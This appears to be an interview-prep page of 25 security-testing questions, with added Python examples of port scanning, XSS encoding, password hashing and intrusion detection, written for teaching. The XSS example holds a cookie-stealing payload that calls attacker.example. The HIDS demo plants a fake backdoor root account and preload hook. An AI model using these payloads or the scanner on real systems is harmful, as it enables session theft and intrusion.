Top 25 Security Testing Interview Questions
Q1. List The Seven Main Types Of Security Testing As Per The Open Source Security Testing Methodology Manual?
The seven main kinds of security testing according to the Open Source Security Testing Methodology Manual (OSSTMM) are:
Vulnerability Scanning: Automated software scans a system against a database of known vulnerabilities.
Security Scanning: Manual or automated techniques used to identify network and system weaknesses.
Penetration Testing: A simulated attack on a system that helps to identify the vulnerabilities an attacker could actually exploit.
Risk Assessment: Analysis of the possible risks in the system. Risks are classified as Low, Medium and High.
Security Auditing: A complete inspection of systems and applications to detect vulnerabilities.
Ethical Hacking: Hacking carried out on a system to find its flaws, rather than for personal gain.
Posture Assessment: Combines security scanning, ethical hacking and risk assessment to show the overall security posture of an organization.
Q2. List The Parameters That Define An SSL Session Connection?
The parameters that define an SSL connection state are:
Server and client random
Server write MAC secret
Client write MAC secret
Server write key
Client write key
Initialization vectors
Sequence numbers
Q3. What Is SOAP And WSDL?
SOAP, or Simple Object Access Protocol, is an XML-based protocol through which applications exchange information, normally over HTTP. A SOAP client sends an XML request message to the web service; the server responds with a SOAP message containing the result of the requested service.
Web Services Description Language (WSDL) is an XML-formatted language used together with UDDI. "Web Services Description Language describes Web services and how to access them".
Q4. What Is An SSL Connection And An SSL Session?
An SSL (Secure Sockets Layer) connection is a transient peer-to-peer communications link; every connection is associated with one SSL session.
An SSL session is an association between a client and a server, normally created by the Handshake Protocol. It defines a set of cryptographic security parameters that can be shared across multiple SSL connections, which avoids negotiating new parameters for each connection.
Q5. What Is Intrusion Detection?
Intrusion detection is a system that helps to identify possible attacks and to deal with them. Intrusion detection involves collecting information from many systems and sources, analysing that information and finding the possible ways in which the system could be attacked.
Intrusion detection checks the following:
Possible attacks
Any abnormal activity
Auditing of system data
Analysis of the various collected data, etc.
Q6. List The Principal Categories Of SET Participants?
Following are the participants in Secure Electronic Transaction (SET):
Cardholder
Merchant
Issuer
Acquirer
Payment gateway
Certification authority
Q7. What Is Security Testing?
Security testing can be considered the most important of all types of software testing. Its main goal is to find vulnerabilities in any software (web or network based) application and to protect its data from possible attacks or intruders.
Many applications hold confidential information that must be protected from leaking. Security testing needs to be performed periodically on such applications to identify threats and to take immediate action on them.
Q8. What Is Port Scanning?
Ports are the points through which information goes into and out of a system. Scanning the ports to find weak points in the system is called port scanning. There may be weak points in the system that hackers can attack to obtain critical information; these points have to be identified and protected from misuse.
Following are the types of port scans:
Strobe: Scanning of known services only.
UDP: Scanning of open UDP ports.
Vanilla: The scanner tries to connect to all 65,535 ports.
Sweep: The scanner connects to the same port on more than one machine.
Fragmented packets: The scanner sends packet fragments that get through simple packet filters in a firewall.
Stealth scan: The scanner prevents the scanned computer from recording the port scan activity.
FTP bounce: The scanner goes through an FTP server in order to disguise the source of the scan.
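As an added example, not part of the original page, the following Python implements the vanilla and sweep variants from the list above as a TCP connect() scan using only the standard library. So that it runs offline, it opens its own listener on an ephemeral loopback port as a constructed target; in practice you would point it only at hosts you are authorized to test. The second loopback address used in the sweep is an assumption about the local host's configuration.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def tcp_connect_scan(host, ports, timeout=0.5, workers=32):
    """Vanilla-style TCP connect() scan: complete a full three-way handshake
    with each port and report the ones that accepted the connection.
    A connect() scan is noisy (the target service logs the connection),
    which is exactly what the stealth variants in the list above try to avoid."""
    def probe(port):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success and an errno (e.g. ECONNREFUSED)
            # on a closed port instead of raising an exception.
            return port if s.connect_ex((host, port)) == 0 else None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(p for p in pool.map(probe, ports) if p is not None)


def port_sweep(hosts, port, timeout=0.5):
    """Sweep-style scan: the same port across several hosts."""
    return [h for h in hosts if tcp_connect_scan(h, [port], timeout)]


def demo():
    """Constructed target: a listener on an ephemeral loopback port, so the
    scan has something to find without touching a real network."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    try:
        found = tcp_connect_scan("127.0.0.1", range(open_port - 3, open_port + 4))
        # 127.0.0.2 is assumed to have nothing listening on that port.
        swept = port_sweep(["127.0.0.1", "127.0.0.2"], open_port)
    finally:
        listener.close()
    return open_port, found, swept


if __name__ == "__main__":
    port, found, swept = demo()
    print("listener on", port, "-> open ports found:", found)
    print("hosts with port", port, "open:", swept)
```

The range scanned in demo() is deliberately narrow; a vanilla scan would pass range(1, 65536) instead, and the thread pool size is what keeps that tolerable.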
Q9. List Some Factors That Can Cause Vulnerabilities?
Factors causing vulnerabilities are:
Design flaws – Loopholes in the system that can allow hackers to attack it easily.
Passwords – If passwords become known to hackers they can obtain the information very easily. A password policy must be followed rigorously to minimize the risk of password theft.
Complexity – Complex software can open the door to vulnerabilities.
Human error – Human error is a significant source of security vulnerabilities.
Management – Poor management of data can lead to vulnerabilities in the system.
Q10. What Is XSS Or Cross Site Scripting?
XSS, or cross-site scripting, is a type of vulnerability that hackers use to attack web applications.
It allows hackers to inject HTML or JavaScript code into a web page, which can steal confidential information from cookies and return it to the attacker. It is one of the most critical and common attacks and needs to be prevented, typically by encoding untrusted data for the context (HTML text, attribute, URL) in which it is output.
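The following Python is an added example, not code from the original page. It places the vulnerable pattern beside its fix: a comment renderer that reflects user input verbatim, one that HTML-encodes for the text-node context, and a link renderer for the attribute context, where encoding alone is not enough. The payload and the attacker host name are constructed placeholders.

```python
import html
from urllib.parse import urlparse

# Constructed attacker input (host name is a placeholder): a script tag that
# sends the victim's cookies to an attacker-controlled server.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def render_comment_vulnerable(comment):
    """Reflects user input into the page unchanged: the browser parses the
    attacker's <script> tag as markup and executes it."""
    return '<div class="comment">%s</div>' % comment


def render_comment_safe(comment):
    """HTML text-node context: encode &, <, >, " and ' as entities so the
    payload is displayed as text rather than executed."""
    return '<div class="comment">%s</div>' % html.escape(comment, quote=True)


def render_link_safe(user_url):
    """Attribute (href) context: a javascript: URL executes without any
    angle brackets, so entity-encoding alone does not help. Allow only
    http/https schemes, then attribute-encode the value."""
    scheme = urlparse(user_url).scheme.lower()
    if scheme not in ("http", "https"):
        user_url = "#"
    return '<a href="%s">link</a>' % html.escape(user_url, quote=True)


def looks_executable(rendered):
    """Crude test oracle: does the rendered HTML still contain a raw
    <script tag or a javascript: href?"""
    low = rendered.lower()
    return "<script" in low or 'href="javascript:' in low


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_link_safe("javascript:alert(document.cookie)"))
```

looks_executable() is only a demonstration oracle; a real test would load the page in a browser or a headless engine, since encoding that is correct for one context can still be bypassed in another.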
Q11. What Is File Enumeration?
This kind of attack uses forceful browsing together with URL manipulation. Hackers can manipulate the parameters in the URL string and obtain critical information that is normally not open to the public, such as archived data, old versions, or data that is still under development.
Q12. List The Full Names Of Abbreviations Related To Software Security?
Abbreviations related to software security are:
IPsec – Internet Protocol Security, a suite of protocols for securing Internet Protocol communications
OSI – Open Systems Interconnection
ISDN – Integrated Services Digital Network
GOSIP – Government Open Systems Interconnection Profile
FTP – File Transfer Protocol
DBA – Dynamic Bandwidth Allocation
DDS – Digital Data System
DES – Data Encryption Standard
CHAP – Challenge Handshake Authentication Protocol
BONDING – Bandwidth On Demand Interoperability Group
SSH – Secure Shell
COPS – Common Open Policy Service
ISAKMP – Internet Security Association and Key Management Protocol
USM – User-based Security Model
TLS – Transport Layer Security
Q13. List The Various Methodologies In Security Testing?
Methodologies in security testing are:
White Box – All the information is provided to the testers.
Black Box – No information is provided to the testers, and they test the system as in a real-world situation.
Grey Box – Partial information is given to the testers, and the rest they have to find out on their own.
Q14. What Is ISO 17799?
ISO/IEC 17799 was originally published in the UK and defines best practices for information security management. It has guidelines for all organizations, small or large, on information security. It was later renumbered as ISO/IEC 27002.
Q15. List The Parameters That Define An SSL Session State?
The parameters that define an SSL session state are:
Session identifier
Peer certificates
Compression method
Cipher spec
Master secret
Is resumable
Q16. Name The Two Common Techniques Used To Protect A Password File?
The two common techniques for protecting a password file are hashed passwords combined with a salt value, and access control on the password file itself.
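Both techniques in working form, as an added Python example that is not part of the original page: PBKDF2-HMAC-SHA256 with a random per-user salt, constant-time verification, and a password file created with owner-only permissions. The record format, iteration count and user names are choices made for this example.

```python
import base64
import hashlib
import hmac
import os
import stat
import tempfile

ITERATIONS = 600_000  # this example's choice; tune to your hardware budget


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated hash. A fresh 16-byte random salt per user means two
    users with the same password get different records, and an attacker
    cannot precompute one table of hashes for the whole file."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password, record):
    """Recompute with the stored salt and iteration count; compare in
    constant time so timing does not leak how many bytes matched."""
    algo, iterations, salt_b64, digest_b64 = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


def write_password_file(path, records):
    """Access control: create the file with mode 0600 (owner read/write only)
    in the same call that creates it, so there is no window in which it is
    world-readable. This mirrors how /etc/shadow is protected."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        for user, record in records.items():
            fh.write("%s:%s\n" % (user, record))
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Constructed users (same password, different salts); returns the
    records and the file mode actually set on disk."""
    records = {"alice": hash_password("correct horse battery staple"),
               "bob": hash_password("correct horse battery staple")}
    with tempfile.TemporaryDirectory() as d:
        mode = write_password_file(os.path.join(d, "shadow"), records)
    return records, mode


if __name__ == "__main__":
    records, mode = demo()
    print("mode %o" % mode)
    for user, record in records.items():
        print(user, record)
```

Storing the iteration count inside the record lets you raise it later without breaking existing users: verify with the stored count, then re-hash on successful login.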
Q17. What Are The Types Of Cookies?
Types of cookies are:
Session cookies – These cookies are temporary and last for that browser session only.
Persistent cookies – These cookies are stored on the hard disk drive and last until they expire or are manually removed.
Q18. What Is A Honeypot?
A honeypot is a decoy computer system that behaves like a real system and attracts hackers to attack it. A honeypot is used to find loopholes in the system, to observe how attackers operate, and to provide solutions for these kinds of attacks.
Q19. What Is HIDS?
HIDS, or Host Intrusion Detection System, is a system in which a snapshot of the existing system is taken and compared with a previous snapshot. It checks whether critical files have been modified or deleted; if so, an alert is generated and sent to the administrator.
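The snapshot-and-compare approach described above, as an added Python example that is not the page's own code: a baseline of file hashes, a second snapshot, and a comparison that reports modified, deleted and added files. The directory tree and the tampering are constructed inside a temporary directory standing in for a host.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Baseline: SHA-256 of every regular file under root, keyed by the
    path relative to root (with / separators)."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            result[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return result


def diff_snapshots(baseline, current):
    """Compare a new snapshot against the baseline and classify the changes."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "deleted": sorted(k for k in baseline if k not in current),
        "added": sorted(k for k in current if k not in baseline),
    }


def alerts(changes):
    """One alert line per change, as the HIDS would send to the administrator."""
    return ["HIDS ALERT: %s %s" % (kind, path)
            for kind in ("modified", "deleted", "added")
            for path in changes[kind]]


def _write(root, rel, text):
    os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
    with open(os.path.join(root, rel), "w") as fh:
        fh.write(text)


def demo():
    """Constructed scenario: take a baseline, then tamper with the tree the
    way an intruder might (extra root account, removed file, preload hook)."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
        _write(root, "etc/hosts", "127.0.0.1 localhost\n")
        baseline = snapshot(root)
        _write(root, "etc/passwd", "root:x:0:0:root:/root:/bin/bash\nbackdoor:x:0:0::/:/bin/sh\n")
        os.remove(os.path.join(root, "etc/hosts"))
        _write(root, "etc/ld.so.preload", "/tmp/evil.so\n")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for line in alerts(demo()):
        print(line)
```

The baseline only proves anything if it is stored where the intruder cannot rewrite it (read-only media or a separate host); a baseline kept on the monitored machine can be updated along with the tampered files.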
Q20. List The Components Used In SSL?
The Secure Sockets Layer protocol, or SSL, is used to make a secure connection between clients and servers.
Below are the components used in SSL:
SSL Record Protocol
Handshake Protocol
Change Cipher Spec Protocol
Alert Protocol
Encryption algorithms
Q21. What Are The Three Classes Of Intruders?
Following are the three classes of intruders:
Masquerader: An individual who is not authorized to use the computer but penetrates the system's access controls to exploit a legitimate user's account.
Misfeasor: A legitimate user who accesses data, programs or resources for which they are not authorized, or who is authorized but misuses their privileges.
Clandestine user: An individual who seizes supervisory control of the system and uses it to evade auditing and access controls, or to suppress audit collection.
Q22. Describe Network Intrusion Detection System?
A Network Intrusion Detection System is usually referred to as NIDS. It is used to analyse the traffic passing over an entire subnet and to match it against known attacks. If any suspicious activity is identified, the administrator gets an alert.
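As an added example, not from the original page, the following Python shows the core of what such a sensor does: each packet's payload is matched against a set of attack signatures, and a per-source counter flags a host that touches many distinct ports, the port-scan pattern from Q8. The signatures and the packet list are constructed for this example and stand in for a real rule set and a live capture.

```python
import re
from collections import defaultdict

# Signatures for known attacks: name -> pattern matched against the payload.
# Constructed for this example; a real NIDS ships thousands of such rules.
SIGNATURES = {
    "web.sqli": re.compile(rb"(?i)'\s*or\s*'1'\s*=\s*'1"),
    "web.traversal": re.compile(rb"\.\./\.\./"),
}

# Constructed traffic as (src, dst, dst_port, payload) tuples, standing in
# for packets captured from the subnet by a sensor in promiscuous mode.
PACKETS = [
    ("10.0.0.5", "10.0.0.20", 80, b"GET /login?user=admin' or '1'='1 HTTP/1.1\r\n"),
    ("10.0.0.5", "10.0.0.20", 80, b"GET /../../../../etc/passwd HTTP/1.1\r\n"),
    ("10.0.0.9", "10.0.0.20", 22, b"SSH-2.0-OpenSSH_9.0\r\n"),
] + [("10.0.0.7", "10.0.0.20", p, b"") for p in (21, 22, 23, 25, 80, 443)]


def inspect(packets, scan_threshold=5):
    """Match each packet against the signature set (misuse detection) and
    flag a source once it has touched scan_threshold distinct host:port
    pairs (a simple anomaly rule for port scans). Returns alert tuples."""
    alerts = []
    targets_by_src = defaultdict(set)
    for src, dst, dport, payload in packets:
        for name, pattern in SIGNATURES.items():
            if pattern.search(payload):
                alerts.append((name, src, dst, dport))
        targets_by_src[src].add((dst, dport))
        if len(targets_by_src[src]) == scan_threshold:
            alerts.append(("recon.portscan", src, dst, dport))
    return alerts


def demo():
    return inspect(PACKETS)


if __name__ == "__main__":
    for alert in demo():
        print("NIDS ALERT %s from %s to %s:%d" % alert)
```

Signature matching on raw payloads misses attacks that are encoded or split across packets; real sensors normalize (URL-decode, reassemble TCP streams) before matching, which is also where much of their complexity and many of their evasion bugs live.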
Q23. List The Benefits That Can Be Provided By An Intrusion Detection System?
An intrusion detection system helps to identify possible attacks and abnormal activity and to audit system data (see Q5). The three types of intrusion detection system are:
NIDS or Network Intrusion Detection System
NNIDS or Network Node Intrusion Detection System
HIDS or Host Intrusion Detection System
Q24. What Is A Cookie?
A cookie is a piece of information received from a web server and stored in a web browser, which can be read back at any time later. A cookie can contain session or password information and some auto-fill data, and if hackers obtain these details it can be dangerous.
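Serving both Q17 and Q24, the following Python is an added example and not code from the original page. It builds a session cookie and a persistent cookie with the standard library's http.cookies, showing that the only difference between the two is the presence of Max-Age (or Expires), and includes a small audit function of the kind a tester uses on Set-Cookie headers to spot cookies that an XSS payload could read or that travel over plain HTTP. The cookie names and values are constructed.

```python
from http.cookies import SimpleCookie


def build_cookie(name, value, max_age=None, secure=True, httponly=True, samesite="Lax"):
    """Return a Set-Cookie header value. Without Max-Age (or Expires) the
    browser keeps the cookie in memory for the session only; with it the
    cookie is written to disk and survives until expiry or manual removal."""
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["path"] = "/"
    if max_age is not None:
        morsel["max-age"] = max_age
    if secure:
        morsel["secure"] = True      # only sent over HTTPS
    if httponly:
        morsel["httponly"] = True    # not readable via document.cookie (limits XSS theft)
    morsel["samesite"] = samesite    # withheld on most cross-site requests (limits CSRF)
    return morsel.OutputString()


def audit_set_cookie(header):
    """Classify a Set-Cookie header as session or persistent and list the
    protective attributes it lacks."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in header.split(";")[1:]}
    persistent = "max-age" in attrs or "expires" in attrs
    findings = ["missing %s" % flag for key, flag in
                (("secure", "Secure"), ("httponly", "HttpOnly"), ("samesite", "SameSite"))
                if key not in attrs]
    return persistent, findings


if __name__ == "__main__":
    examples = (
        build_cookie("sid", "4f3c9a"),                                       # session cookie
        build_cookie("theme", "dark", max_age=30 * 86400, httponly=False),   # persistent cookie
        "sid=4f3c9a; Path=/",                                                # constructed weak header
    )
    for header in examples:
        print(header, "->", audit_set_cookie(header))
```

A session identifier should normally be a session cookie with all three attributes set; a persistent cookie carrying a preference can reasonably omit HttpOnly if client-side script has to read it, which is why the audit reports findings rather than deciding pass or fail.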
Q25. List The Attributes Of Security Testing?
There are the following seven attributes of security testing:
Authentication
Authorization
Confidentiality
Availability
Integrity
Non-repudiation
Resilience

